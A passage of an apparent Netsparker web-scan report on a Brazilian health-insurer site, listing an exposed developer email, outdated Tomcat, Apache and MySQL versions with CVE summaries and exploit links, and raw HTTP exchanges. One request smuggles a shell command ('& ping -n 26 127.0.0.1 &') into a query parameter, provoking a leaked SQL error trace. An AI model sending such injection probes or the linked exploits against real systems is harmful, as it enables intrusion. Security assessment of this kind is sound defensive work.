1&quot; org.apache.struts.action.RequestProcessor.processException(RequestProcessor.java:516) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:423) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>root cause</b> <pre>java.sql.SQLException: Duplicate key or integrity constraint violation message from server: &quot;Duplicate entry '_!@4dilemma:0' for key 1&quot; com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1997) com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1906) com.mysql.jdbc.MysqlIO.nextRow(MysqlIO.java:997) com.mysql.jdbc.MysqlIO.getResultSet(MysqlIO.java:296) com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:1325) com.mysql.jdbc.MysqlIO.sqlQuery(MysqlIO.java:1224) com.mysql.jdbc.Connection.execSQL(Connection.java:2244) com.mysql.jdbc.Connection.execSQL(Connection.java:2192) com.mysql.jdbc.Statement.executeQuery(Statement.java:1163) org.jboss.resource.adapter.jdbc.WrappedStatement.executeQuery(WrappedStatement.java:208) br.com.unimed.portal.veiculocomunicacao.dao.ComunicacaoDAO.populaComunicacao(ComunicacaoDAO.java:459) br.com.unimed.portal.veiculocomunicacao.action.DetalheAction.execute(DetalheAction.java:28) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:421) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.9 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.9</h3></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /pct/comum/js/myJsEvents.js

/pct/comum/js/myJsEvents.js

http://www.unimed.com.br/pct/comum/js/myJsEvents.js

Found E-mails

thyago@dynamix.com.br

Request

GET /pct/comum/js/myJsEvents.js HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=F6B94AFF3B7F744646891E37E67ECF39.dcpr5033; JSESSIONID=67AD8B8C6A84DA8FB1B0210276158033.dcpr5034
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:03:10 GMT
Server: Apache/2.2.15 (Red Hat)
Last-Modified: Thu, 19 Mar 2009 20:58:33 GMT
ETag: "1ae401d-10a5-4657f1025b040"
Accept-Ranges: bytes
Content-Length: 4261
Connection: close
Content-Type: text/javascript


/** * version 1.0 * Script JS para armazenamento * e execu��o de fun��es que necessitam * ser executadas ao carregar da pagina. * Ex.: onload s� pode receber 1 function. * Dynamix Software * Thyago Schleuss * thyago@dynamix.com.br */function MyJsEvents( _alertOnloadEvents ) { MyJsEvents.ONLOAD = "load"; MyJsEvents.ONUNLOAD = "unload"; var obj = this; var myList = new List(); // M�todo para inserir fun��es que // devem ser executadas ao carregar da pagina. // Public Method this.addOnLoadEvent = function( _aFunction ) { addEvent( _aFunction , MyJsEvents.ONLOAD ); } // M�todo para inserir fun��es que devem ser // executadas ao fechar a pagina. // Public Method this.addOnUnloadEvent = function( _aFunction ) { addEvent( _aFunction , MyJsEvents.ONUNLOAD ); } // M�todo que adiciona as fun��es e seus eventos // na lista. // Private Method var addEvent = function( _aFunction , _event ) { if( typeof ( _aFunction ) == "function" ) { myList.add( _aFunction , _event ); } else { alert("Par�metro 1 n�o � uma fun��o!"); } } // M�todo usado ap�s registrar todas as suas fun��es. // Responsavel por percorrer a lista de fun��es // adicionadas para adicionar ao respectivo listener // Public Method this.triggerEvent = function() { var nl = myList.getPrim(); while( nl != null ){ addToListener( nl.getInfo() , nl.getEvent() ); nl = nl.getProx(); } } // M�todo responsavel por registrar a fun��o na p�gina // de acordo com o evento especificado // Private Method var addToListener = function( _aFunction , _event ) { if ( window.addEventListener ) { window.addEventListener( _event , _aFunction , false ); } else if ( window.attachEvent ) { window.attachEvent( ( "on" + _event ) , _aFunction ); } } // Implementa��o da lista de fun��es // usada para armazenar as fun��es e // os eventos que devem dispara-las function List () { var prim = null; // M�todo para inserir fun��es // na lista // Public Method this.add = function( _obj , _event ){ var nl = new NoLista(); nl.setInfo( _obj ); nl.setEvent( _event ); nl.setProx( prim ); prim = nl; } // M�todo para verificar // se a lista esta vazia. // Public Method this.isEmpty = function(){ if( prim == null ){ return true; }else{ return false; } } // M�todo que procura uma // fun��o na lista, caso encontre // retorna a propria funcao // Public Method this.find = function( v ) { var nl = prim; while( nl != null ){ if( nl.getInfo() == v ){ return nl; } nl = nl.getProx(); } return null; } // M�todo que retorna o // tamanho da lista // Public Method this.size = function(){ var c = 0; var nl = prim; while( nl != null ){ c++; nl = nl.getProx(); } return c; } // M�todo que retorna a ultima fun��o // da lista // Public Method this.last = function(){ var nl = prim; var u = null; while( nl != null ){ if( nl.getProx() == null ){ u = nl; } nl = nl.getProx(); } return u; } // M�todo para remover uma fun��o da lista // Public Method this.remove = function( v ){ var ant = null; var p = prim; while( ( p != null ) && ( p.getInfo() != v ) ){ ant = p; p = p.getProx(); } if( p == null ){ return; } if( ant == null ){ prim = p.getProx(); }else{ ant.setProx( p.getProx() ); } } // M�todo que retorna o nodo // principal da lista // Public Method this.getPrim = function(){ return prim; } // M�todo para limpar a lista // Public Method this.clear = function(){ prim = null; } } // Nodos da lista. // Cada nodo � uma fun��o com // seu respectivo evento function NoLista() { var info = null; var event = null; var prox = null; this.getInfo = function() { return this.info; } this.setInfo = function( _info ) { this.info = _info; } this.getEvent = function() { return this.event; } this.setEvent = function( _event ) { this.event = _event; } this.getProx = function() { return this.prox; } this.setProx = function( _prox ) { this.prox = _prox; } this.toString = function(){ return this.info; } }}
Tomcat Version Is Out Of Date

Tomcat Version Is Out Of Date

1 TOTAL
INFORMATION
Netsparker identified that the target web server is Tomcat and it is out of date. This information was gathered from the HTTP Headers.

Remedy

Please upgrade your installation of Tomcat to the latest stable version.

Remedy References

Known Vulnerabilities in this Version

Apache Tomcat Directory Listing Information Disclosure Vulnerability

Apache Tomcat allows remote attackers to list directories via a semicolon (;) preceding a filename with a mapped extension, as demonstrated by URLs ending with /;index.jsp and /;help.do.

External References

CVE-2006-3835

Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability

Apache Tomcat allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.

External References

CVE-2005-3510

Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability

Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors.

External References

CVE-2006-7196

Exploit

http://www.securityfocus.com/bid/25531/exploit

Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability

The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.

External References

CVE-2007-1858

Apache Tomcat Cross-Site Scripting Vulnerability

Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.

External References

CVE-2006-7195

Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability

The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.

External References

CVE-2008-0128

Apache Tomcat Accept-Language Cross Site Scripting Vulnerability

Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".

External References

CVE-2007-1358

Apache Tomcat Directory Traversal Vulnerability

Directory traversal vulnerability in Tomcat, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.

External References

CVE-2007-0450

Exploit

http://www.securityfocus.com/bid/22960/exploit

Apache HTTP Request Smuggling Vulnerabilities

Tomcat allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Tomcat to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."

External References

CVE-2005-2090

Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities

Multiple cross-site scripting (XSS) vulnerabilities in the appdev/sample/web/hello.jsp example application in Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.23, and 6.0.0 through 6.0.10 allow remote attackers to inject arbitrary web script or HTML via the test parameter and unspecified vectors.

External References

CVE-2007-1355

Exploit

http://downloads.securityfocus.com/vulnerabilities/exploits/24058.html

Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability

Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the ';' character, as demonstrated by a URI containing a "snp/snoop.jsp;" sequence.

External References

CVE-2007-2449

Exploit

http://www.securityfocus.com/bid/24476/exploit

Apache Tomcat Cross-Site Scripting Vulnerability

Multiple cross-site scripting (XSS) vulnerabilities in the Manager and Host Manager web applications in Apache Tomcat allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.

External References

CVE-2007-2450

Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities

Apache Tomcat treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.

External References

CVE-2007-3382, CVE-2007-3385

Exploit

http://www.securityfocus.com/bid/25316/exploit

Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability

Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.

External References

CVE-2007-3386

Exploit

http://www.securityfocus.com/data/vulnerabilities/exploits/25314.html

Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability

Apache Tomcat does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.This issue exists because of an incomplete fix for CVE-2007-3385.

External References

CVE-2007-5333

Exploit

http://www.securityfocus.com/bid/27706/exploit

Apache Tomcat JULI Logging Component Default Security Policy Vulnerability

The default catalina.policy in the JULI logging component in Apache Tomcat does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the level, directory, and prefix attributes in the org.apache.juli.FileHandler handler.

External References

CVE-2007-5342

Apache Tomcat WebDav Remote Information Disclosure Vulnerability

Absolute path traversal vulnerability in Apache Tomcat, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.

External References

CVE-2007-5461

Exploit

http://www.securityfocus.com/bid/26070/exploit

Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability

Cross-site scripting (XSS) vulnerability in Apache Tomcat allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.

External References

CVE-2008-1232

Exploit

http://downloads.securityfocus.com/vulnerabilities/exploits/30496.txt

Apache Tomcat Host Manager Cross Site Scripting Vulnerability

Cross-site scripting (XSS) vulnerability in Apache Tomcat allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.

External References

CVE-2008-1947

Exploit

http://www.securityfocus.com/bid/29502/exploit

Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability

Apache Tomcat, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.

External References

CVE-2008-2370

Exploit

http://www.securityfocus.com/bid/30494/exploit

Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability

Apache Tomcat, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.

External References

CVE-2008-5515

Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability

Apache Tomcat, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.

External References

CVE-2009-0033

Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness

Apache Tomcat, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the MemoryRealm, DataSourceRealm, and JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.

External References

CVE-2009-0580

Exploit

http://www.metasploit.com/modules/auxiliary/scanner/http/tomcat_enum

Apache Tomcat Calendar Cross-Site Scripting

Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."

External References

CVE-2009-0781

Apache Tomcat XML Parser Information Disclosure Vulnerability

Apache Tomcat permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the web.xml, context.xml, or tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.

External References

CVE-2009-0783

Apache Tomcat WAR File Directory Traversal Vulnerability

Directory traversal vulnerability in Apache Tomcat allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.

External References

CVE-2009-2693

Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability

The autodeployment process in Apache Tomcat, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.

External References

CVE-2009-2901

Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability

Directory traversal vulnerability in Apache Tomcat allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.

External References

CVE-2009-2902

Apache Tomcat Windows Installer Insecure Password Vulnerability

The Windows installer for Apache Tomcat, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.

External References

CVE-2009-3548

Exploit

http://www.metasploit.com/modules/auxiliary/scanner/http/tomcat_mgr_login, http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy

Apache Tomcat SecurityManager Security Bypass Vulnerability

Apache Tomcat, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.

External References

CVE-2010-3718

Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities

Apache Tomcat does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."

External References

CVE-2010-2227

Exploit

http://www.metasploit.com/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding

Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability

Apache Tomcat might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires BASIC or DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.

External References

CVE-2010-1157

Exploit

http://www.exploit-db.com/exploits/12343/

Apache Tomcat HTML Manager Interface HTML Injection Vulnerability

Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.

External References

CVE-2011-0013

- /Comunicacao/detalhe.do

/Comunicacao/detalhe.do

http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%22%26%20ping%20-n%2026%2..

Version

5.5.9

Request

GET /Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=710CBF37322A9B4A56B96F96CAF25AE3.dcpr5034; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 15 Nov 2011 17:13:55 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 3551
Connection: close
Content-Type: text/html;charset=utf-8


<html><head><title>Apache Tomcat/5.5.9 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&amp; ping -n 26 127.0.0.1 &amp;' at line 1&quot; org.apache.struts.action.RequestProcessor.processException(RequestProcessor.java:516) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:423) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>root cause</b> <pre>java.sql.SQLException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&amp; ping -n 26 127.0.0.1 &amp;' at line 1&quot; com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1997) com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:1167) com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:1278) com.mysql.jdbc.MysqlIO.sqlQuery(MysqlIO.java:1224) com.mysql.jdbc.Connection.execSQL(Connection.java:2244) com.mysql.jdbc.Connection.execSQL(Connection.java:2192) com.mysql.jdbc.Statement.executeQuery(Statement.java:1163) org.jboss.resource.adapter.jdbc.WrappedStatement.executeQuery(WrappedStatement.java:208) br.com.unimed.portal.veiculocomunicacao.dao.ComunicacaoDAO.populaComunicacao(ComunicacaoDAO.java:459) br.com.unimed.portal.veiculocomunicacao.action.DetalheAction.execute(DetalheAction.java:28) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:421) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.9 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.9</h3></body></html>
Apache Version Is Out Of Date

Apache Version Is Out Of Date

1 TOTAL
INFORMATION
Netsparker identified that the target web server's Apache server and it is out of date. This was disclosed through the HTTP response.

Remedy

Please upgrade your installation of Apache to the latest stable version.

Remedy References

Known Vulnerabilities in this Version

Apache mod_cache and mod_dav Request Handling Denial of Service Vulnerability

The mod_cache and mod_dav modules in the Apache HTTP Server allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.

External References

CVE-2010-1452

Apache APR-util apr_brigade_split_line() Denial of Service Vulnerability

Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util), as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.

External References

CVE-2010-1623

Apache APR apr_fnmatch() Denial of Service Vulnerability

Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.

External References

CVE-2011-0419

Exploit

http://www.securityfocus.com/data/vulnerabilities/exploits/47820.txt

- /portal/

/portal/

http://www.unimed.com.br/portal/

Version

2.2.15

Request

GET /portal/ HTTP/1.1
Referer: http://www.unimed.com.br/portal/comum/scripts/swfobject.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 15 Nov 2011 17:03:08 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Set-Cookie: JSESSIONID=7098F503D4C40B2DC71CF926660B98C6.dcpr5034; Path=/
Location: http://www.unimed.com.br/capa/index.jsp
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


MySQL Version Is Out Of Date

MySQL Version Is Out Of Date

1 TOTAL
INFORMATION
Netsparker identified that the target web site is using MySQL as backend database and it is out of date.

Remedy

Please upgrade your installation of MySQL to the latest stable version.

Remedy References

Known Vulnerabilities in this Version

MySQL 'COM_FIELD_LIST' Command Buffer Overflow Vulnerability

Buffer overflow in MySQL allows remote authenticated users to execute arbitrary code via a COM_FIELD_LIST command with a long table name.

External References

CVE-2010-1850

MySQL 'COM_FIELD_LIST' Command Packet Security Bypass Vulnerability

Directory traversal vulnerability in MySQL allows remote authenticated users to bypass intended table grants to read field definitions of arbitrary tables, and on 5.1 to read or delete content of arbitrary tables, via a .. (dot dot) in a table name.

External References

CVE-2010-1848

MySQL Malformed Packet Handling Remote Denial of Service Vulnerability

The my_net_skip_rest function in sql/net_serv.cc in MySQL allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by sending a large number of packets that exceed the maximum length.

External References

CVE-2010-1849

MySQL SELECT Statement DOS Vulnerability

mysqld in MySQL properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.

External References

CVE-2009-4019

MySQL 'ALTER DATABASE' Remote Denial Of Service Vulnerability

MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.

External References

CVE-2010-2008

MySQL Prior to 5.1.52 Multiple Denial Of Service Vulnerabilities

MySQL is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to crash the database, denying access to legitimate users. These issues affect versions prior to MySQL 5.1.52.

External References

http://www.securityfocus.com/bid/47871

MySQL 'sql/sql_table.cc' CREATE TABLE Security Bypass Vulnerability

MySQL is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and gain access to table files created by other users.

External References

CVE-2008-7247

MySQL Prior to 5.1.50 Privilege Escalation Vulnerability

MySQL is prone to a remote privilege-escalation vulnerability. An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system. This issue affects versions prior to MySQL 5.1.50.

External References

http://www.securityfocus.com/bid/43677

MySQL Command Line Client HTML Special Characters HTML Injection Vulnerability

MySQL is prone to an HTML-injection vulnerability because the application's command-line client fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Exploit

http://www.securityfocus.com/data/vulnerabilities/exploits/31486.txt

MySQL Multiple Denial of Service Vulnerabilities

Some vulnerabilities have been reported in MySQL, which can be exploited by malicious users to cause a DoS (Denial of Service).

External References

http://secunia.com/advisories/42097/

MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities

MySQL is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to crash the database, denying access to legitimate users. These issues affect versions prior to MySQL 5.1.51.

External References

CVE-2010-3833, CVE-2010-3834, CVE-2010-3835, CVE-2010-3836, CVE-2010-3837, CVE-2010-3838, CVE-2010-3839, CVE-2010-3840

MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability

MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. Versions prior to MySQL 5.1.49 are vulnerable.

External References

CVE-2010-3676

MySQL Prior to 5.1.49 'JOIN' Statement Denial Of Service Vulnerability

MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.

External References

CVE-2010-3677

MySQL Prior to 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability

MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.

External References

CVE-2010-3678

MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability

MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. Versions prior to MySQL 5.1.49 are vulnerable.

External References

CVE-2010-3679

MySQL 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability

MySQL is prone to a denial-of-service vulnerability. An attacker can exploit these issues to crash the database, denying access to legitimate users. This issues affect versions prior to MySQL 5.1.49.

External References

CVE-2010-3680

MySQL 'HANDLER' interface Denial Of Service Vulnerability

MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.

External References

CVE-2010-3681

MySQL 'EXPLAIN' Denial Of Service Vulnerability

MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.

External References

CVE-2010-3682

MySQL 'LOAD DATA INFILE' Denial Of Service Vulnerability

MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.

External References

CVE-2010-3683

MySQL DROP TABLE MyISAM Symbolic Link Local Security Bypass Vulnerability

